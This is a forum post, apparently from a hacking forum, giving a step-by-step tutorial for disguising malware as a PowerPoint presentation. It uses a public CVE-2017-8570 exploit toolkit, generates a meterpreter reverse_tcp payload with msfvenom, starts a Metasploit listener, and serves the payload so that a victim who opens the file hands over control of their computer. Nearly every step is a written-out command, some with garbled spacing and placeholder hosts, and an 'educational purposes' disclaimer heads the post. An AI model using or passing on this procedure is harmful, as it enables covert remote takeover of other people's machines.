Virus disguise under PowerPoint

Mutt

Professional
Messages
1,456
Reaction score
1,054
Points
113
This material is provided for educational purposes only and was created as part of the study of information security. The author did not publish material for malicious purposes. If someone uses the information for personal gain, then the author is not responsible for any harm or damage caused.

What we need:
  1. Kali linux
  2. Metasploit
  3. Knowledge of basic Linux commands

Begin:
1) Download the exploit from GitHub-> https://github.com/tezukanice/Office8570

2) Go to the exploit folder:
Code:
cd Office8570

3) Create a folder "template" (It will be needed for the successful generation of the ppsx file)
Code:
mkdir template

4) Transfer the template.ppsx file (it is located in the folder that we downloaded)
Code:
cp template.ppsx template /

5) Create the .ppsx file itself (the name of the presentation changes here)
Code:
python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http: //yourpi/logo.doc

We made a presentation file, but we need to embed a virus (payload) into it.

7) Create Payload
Code:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = YourIpy LPORT = 4444 -f exe> /tmp/shell.exe

8) We launch a listener, which will report and receive control after opening the file by the victim.
Code:
msfconsole -x “use multi / handler; set PAYLOAD windows / meterpreter / reverse_tcp; set LHOST YourAype; set LPORT 4444; run "

9) Start the server
Code:
python cve-2017-8570_toolkit.py -M exp -e http: //yourpi/shell.exe -l /tmp/shell.exe

Principle of operation
After the victim opens the presentation, the virus starts downloading unnoticed, and then the computer automatically launches it. After that, a session will open in the console and you will be able to control the victim's computer.
 
Top